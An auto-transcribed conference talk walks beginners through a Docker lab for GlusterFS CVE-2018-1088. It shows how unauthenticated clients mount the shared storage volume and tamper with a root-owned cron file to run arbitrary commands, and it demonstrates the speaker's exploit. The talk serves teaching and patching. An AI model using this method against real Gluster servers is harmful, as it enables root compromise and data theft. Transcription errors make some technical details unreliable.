 So thank you for our second talk of the day. This is Maro. He's going to be talking about owner Gluster VS. Make sure you ask him about the exploit he has. Hey, how are you? Well, uh, this is a talk. It's a really beginner friendly talk. It's about exploiting Gluster, CVE 20181088. It's an authenticated access to every shared storage. This is a talk that I wrote having in mind, uh, for those who are new to both worlds exploit writing and data replication in fact. So the entry point for many people into the world of data replication is Gluster. And I also found that it was really easy to to write an exploit for the CVI. So I wanted to share it to everyone who's interested in writing exploits in the future. Uh, so, uh, I want to ask for your pardon in advance for my pronunciation might not be the best. So if something it's not, uh, understood, just write on your, uh, sorry, write your hand and I'll try to repeat it. So let's start. Uh, brief introduction of who am I and what I'm doing. I'm from Argentina. I was born in the 90s. I work at Almalac for government office. I own a really small company related to Infosec in Argentina. And well, let's get going. For this talk, uh, I wanted to build a lab, um, mirror machines, but I decided Docker because uh, a recommendation from a friend. So anybody here uses Docker? Fine. For the rest who doesn't, it's really easy going. It's really easy to understand. Uh, this talk, it's mainly, uh, a hands-on lab. So I understand many of you won't want to connect to the Wi-Fi network. Many of you won't feel, uh, comfortable downloading an exploit for a repo. Most of you won't feel comfortable, uh, using Docker here in this environment. So it's nice if you don't want to follow it. Uh, you can download it later. I'll try to, uh, follow that lab here like a live demo. So, okay. A quick start on Gluster for everybody who doesn't use it. Gluster is a Scalable Network file system. You can use any hardware, any cheap hardware you have to run it. It's, uh, as I said before, it's a really good starting point for those interested in data duplication. You can duplicate almost any data. We have, uh, almost any data on any hardware, I mean. Uh, we have succeeded using it on really, really humble hardware, uh, Raspberry Pi's and, and the like, all laptops and so, and even we have used it some USB drives to clone and it worked like a charm. It was acquired by Red Hat in 2011, but it's also available in the free world as a new open source stone. So, uh, as I was saying before, anything, anything can run Gluster. It's really hard to see something that doesn't work with it. Call it, uh, FreeBSD, NetBSD, OpenBSD, wherever, even Raspbian. Anything you want can run it. In this talk, we'll set up Gluster as a simple replication service. We won't enter into that hassle of configuring complex things. Uh, the bug itself, the vulnerability, it's really, really silly in fact. So, we will build a simple lab, nothing complex. Uh, our minimalistic setup will have two Gluster nodes, a volume for each node, and a single brick for each volume, and a bunch of test files. What's, what does a node mean? Any server or computer that holds one or more bricks? The bricks are the basic, basic unit of storage in Gluster. And a volume, it's a logical collection of those. Every file resides inside bricks. Uh, you can think of them like a sort of short directories. I know it's not the exact definition, but it's for having a, a simple idea of this. Bricks compose volumes. All operations will occur at node level, and will propagate accordingly. Uh, this illustrates basically everything I say before. You have the mount point on your operating system, the replicated volume, sorry, and the files on the bricks. A quick start on Docker for those who haven't used it before. Uh, Docker is the company driving the container moment. A container platform provides all the pieces and their price operation requires including security, governance, automation, support, automation, atomization, and certification. This is, uh, the definition provided by Docker itself. Let's, uh, suppose we have virtual machines. You can have an app like, okay, I will separate them in a VM for the app, a VM for the database. And if you want, uh, a VM for the file systems, if you want. Containers are different. Uh, as they are oriented for microservices, they made, uh, the target is to have a minimal functional, functional unit. But a container based infrastructure, your app, the same as before, may look like this. A backend app, just you'll, uh, have your custom binaries, your custom libraries, and your app. Nothing else. The web server, you might have a container for Apache, for NGINX, for whatever you want. And the DB container might have just a DB engine. And even it might not have, it might not hold the database itself, the data files. Here we have a comparison. As you might see, you're just using your custom, uh, things. Uh, your custom application, your custom binaries, your custom libraries on your container. Everything else they use online is shared among, across all the containers. Uh, okay, uh, common question is, what are my configuration files? We won't use them in this case, but it's, uh, I think that always troubled me when I was learning Docker. If you follow the best practices, you will store them in an external volume. And you can even share all your config files across all your containers. So, you can have a better control of your configuration files. Say, okay, this instance is configured that way. Okay, everyone, every instance will be following that policy, if we want to call it like that. Okay, the OS, Docker uses run C. You might remember a slip container with runs in the same operating systems. They have, uh, also features layered file systems. Okay, the binaries, even if you're using Q-Stone ones, the classic unique user land is shared and every label along all the containers. Okay, we'll build, uh, our hands-on slab. Once again, I know you may not be comfortable doing this line right now. So, okay, no problem. Uh, I'll have a live demo here. The Docker containers, uh, you can easily install, uh, I love doing install, APT install Docker, Git, and last class client on that specific version. Uh, this obviously works for JOM or DNF-based distros. So, no problem. Even for free VSD. Okay, I have sent out my repo, giveoutan, on github.com. Uh, you can simple build the image, tag it whatever you want. The tag is the name you're giving to the image itself. Giveoutanglaster. It should be run in a privileged environment because cluster requires to do so. Uh, you can run must, uh, most of the images or Docker files around there without any privileged user. So, uh, this will give us an, uh, an instance ID that you can use it to identify that container. Uh, the magic of Docker is that you can run as many instance as you like, or as you can, of the same product. So, if we run this command or Docker around privileged through, twice, we will have two instances of the lab. If we run it three times, we have three instances and so on. This is really useful when you need to have, uh, obviously configuring something atop, like, uh, file over or the, uh, like a distribution. Uh, using, uh, the command Docker PS, you can see a lab. They're both running with different IDs, obviously, and what they are doing. I will have, I would like to share with you the Docker file so you can see, uh, how easy it is, it is built. This is our Docker file. As you might see, this is the base. From there we are going to make the stretch slim so we are pulling an already made image. We just run update, have install, without prompting, lost to the server, the vulnerable version. 3881. We purge everything that we don't need. Docker points to microservices so, uh, we need to have a minimal setup of every container. And these are, these are the, uh, custom configurations to make the cluster volume directory, to have it absolute access for this test, to run cluster and to change the PS1 just to look like the one assured here. Uh, sorry. The PS1 thing is something aesthetic just to have that way here. Okay. As you might see, we have both containers running. Uh, we can enter the containers just doing that command, Docker, exec, TI, it's for executing in, on a interactive way, bash. So we have the IP address of every container. How do we set up Gluster for this? As we have two containers, we'll call them server A and server B. Uh, we can enter server A and issue the following commands. Gluster, peer, prove, server B. This is for turning the server A, A. Recognize that one. Check if that one is running a cluster instance and pair with it. Gluster, peer, status. And on the other side too, Gluster, peer, status. We have something like this. As you might see. Proof, yeah, it's working. Status, yeah, I have a peer. This is my new peer. From the other side, we don't have to pair it again. Status, number of peers one, and a unit, unique ID. So, they are recognized as pointers. Remember, they are vulnerable versions. They are already patched up, so don't keep these containers for anything, uh, more than testing. Okay, let's keep going. Uh, we have to create volumes for this. Gluster, volume, create, def, com, ball, replica two, transport, TCP, wire, server A, on this mount point. Remember in the Docker file, we stated to create this mount point. It won't create it if it doesn't exist. Then on server A, again, Gluster, volume, start, def, com, ball. So, start this volume. And Gluster, volume, info from the other side, just to check if it found it. You might see these are the output from the comments. Success, start the volume, restore it. And this one, without further interaction, knows where it is located and starts to replicate here. This lab is already set up for replicating. So, on a client, on a desktop, laptop, whatever we are using, outside the Docker, we make our mount point, give out, down, pock. So, you do, mount Gluster FS, wire, on server A, def, com, ball, as you might see, we skip it, any path, just def, com, ball. Wire, mount it here, where we just make the mount, give out, down, pock. This will create, this will, sorry, this will mount originally create volume. Then on our desktop, echo data duplication village to mount, give out, down, banner, dot, dot. This will make the replication to happen. So, we'll cut the file on both nodes and check it has replicated, in fact. As you might see, here we create the file, cut, work it, cut, work it, no further interaction. It's really easy for people who are newcomers to this world. I am, in fact, a newcomer to this world, so I found it really easy to get myself involved with in Gluster. Now, if everything went the right way, OLAB is replicated, but it's not vulnerable, but, see, still. So, let's destroy it. This, for everybody who's not into the container moment, or, is the logic behind Docker, or behind any microservice. You run, it fails. Okay, we respond, and we keep running. The main point in Gluster is to be recycled, to be constantly reissued for saying it on a certain way. Okay, let's use get out down to on Gluster. First, I want you to understand what the CBE is about. This is a new CBE. This is from May. I wrote this talk in June. It was patched just some, maybe, some, I think, two or three days after it was issued. It was a really silly bug. Get out down, Gluster and viral, vulnerable, authentication for data access and nuke. It's unexploited for Gluster FC 1088 and 1112, right in Ruby. Basically, this vulnerability allows any Gluster client to connect without any authentication to a shared storage volume. In that shared storage volume, it's Gluster on it, resides the task scheduler. And by modifying that specific file from the scheduler, a Chrome file, I think we all know how Chrome works. Okay, it's a Chrome file. You can schedule arbitrary commands and tasks, whatever you like. This allows many actions from the privileged escalation to total data compromise or nuke. As you might see, this is using the tool DevSecand. It tells you what vulnerable package you have and what are those vulnerabilities that reside in your system. As you might see, these are the only ones we have, Gluster. Both from the client and from the server and from the common. In order to exploit this, the shared storage feature must be enabled. It is not enabled by default now. It was in the first versions. It was vulnerable historically. So, you should explicitly run in your server. Gluster volume set all, cluster, enable, shared storage, enable. We checked it started running, cluster volume get, cluster, shared storage, cluster, enable, shared storage. And then the snap scheduler should be enabled. It is a Python script, snap scheduler in it. As you might see, this might seem like a complex configuration, but in fact, many enterprise sites already are using this. It might seem something complex for someone like me who doesn't use Gluster for something bigger than a simple proof of coms at lab. But every environment from media and app uses this feature. So, success. Here we see the option enabled. We start the scheduler and says, okay, the snap scheduler is running. But it doesn't only cron snapshots. You can cron wherever you want. In fact, if you use any interface or even the command line, you can pass any arbitrary task. It doesn't have to be a snapshot. This feature to this day works like this. You can pass wherever you want. So, what happens when I share the storage volume that is totally mined, it's intended to be shared. It's architecture of Gluster allows all clients to mount any volume, including the shared storage volume involved with this vulnerability. If at any point the Gluster snapshot scheduler is enabled running that Python script you run, it will create a sim link in it's cron D, obviously owned by root. So, anyone who can mount this can scale cron jobs again, passing wherever they want. This is the red hat advisory untouched. It's like they polish it. As you might see, doing another dash L, we see that it's a sim link to bar run Gluster snap cron tasks. So, as I can interact with it, I could also also attack it using the only nano, B beam, whatever you like, EE, if you come from BSD. So, by showing the given command, your lab is now vulnerable to get out now. Okay, we'll use the exploit. The exploit, it's in fact something really simple. I wrote commenting it line by line. So, any newcomer to the exploit writing world, I'm no expert at all, but if someone wants to start from a point, it's commenting line by line so everybody understands what every line it's doing at any time. You can easily, as I said before, try to hack this using your text, your preferred text editor. But, well, here we have the exploit. It comes as a standalone exploit, my preferred method, or as a metasploit module. In most cases, the standalone will be enough and it takes just a few seconds to exploit this. This is the metasploit version, as you might see, it's further custom-isabled and standalone one. In order to use Gavoudan standalone, you can simply run hem install colorize. Colorize is a gem for having a colored output. You can leave it outside if you want. And just sudo Gavoudan RV and the server you want to exploit. In my case, this one. It won't take more than five seconds and it will schedule a new task, being able to shell. You know, it's like a shell but evil and it's fictional. And then we can check the contents on the tampered Chrome file. As you might see, it crone something to run. This output, this is a failure in the line breaking, but it's well crone. Okay. Now it's time to track the Docker containers. And the result should be similar to this. This should be the output. Gavoudan. Okay. I am with the super user. Gloucester binary located. The server reply to ICMP request. It's a simple request. Nothing really forged or common. Gloucester ports are open. We're attempting to exploit. We have exploited successfully the Gloucester shared storage. We mounted it here. On the client side, this is automatic. So you don't have to set up anything unless you're using the metasploit module. Okay. Now we have access. This is everything we have in the volume. If you have any other compromising file, important file, whatever you have, it will be displayed here and will be fetched. The crone file was altered. And we injected enable Joe. Or whatever you want to run. Okay. You can load the exploit at any time. Check line by line. See how it works. The metasploit module too. It's not pushed into the metasploit official repo. Okay. We'll take our time to explain this if anyone has any question. It's really simple. It's really easy going. So it doesn't have any complexity behind running with super user. There's a little patch we made. It's Castle. Another standalone Ruby script. Why I took the time to build this that seems really overkill. We have really, really big farms of servers running this vulnerable version on many clients. In fact, it's my first time testing a cluster at all. A customer told me, hey, Red Hat issued something, some advisory about cluster. Okay. We used this with Ansible. You know Ansible? Like Jeff or Puppet for poor men like me. It worked. It was okay. Vulnerable, vulnerable option. Or the snapcrone task is assembling, can be exploited. So we have some report to show the customer. It's also in the repo. Also you can find out the Docker file to build the image. Some of these snapshots. Okay. How do I patch this? Like most vulnerabilities out there, the vendor issued its own patch. Simple update, upgrade, whatever you like. It's available across all platforms. Remember, cluster is available from Windows to Linux to even BSD. So everybody has its patch already running. Okay. My conclusions and questions. Glaster is not vulnerable per se. It's not something like a dope flash player. In fact, in a span of five years, it had less than 10 vulnerabilities. In fact, we had six. Two, the last two are after Red Hat bought them. They were included before being bought by Red Hat, but Red Hat found them. And simple bugs like this can bring chaos. So if you now feel like forking about them, modifying it, translating it, writing something else, be my guest. It's free to use. And it's a nice starting point for teaching someone to write an exploit step-by-step without having to learn assembler, C or memory position, something that could be hard to newcomers and could scare them off. Okay. Special thanks to the data application media crew and to my working team. Anybody has any questions? Okay. Thank you.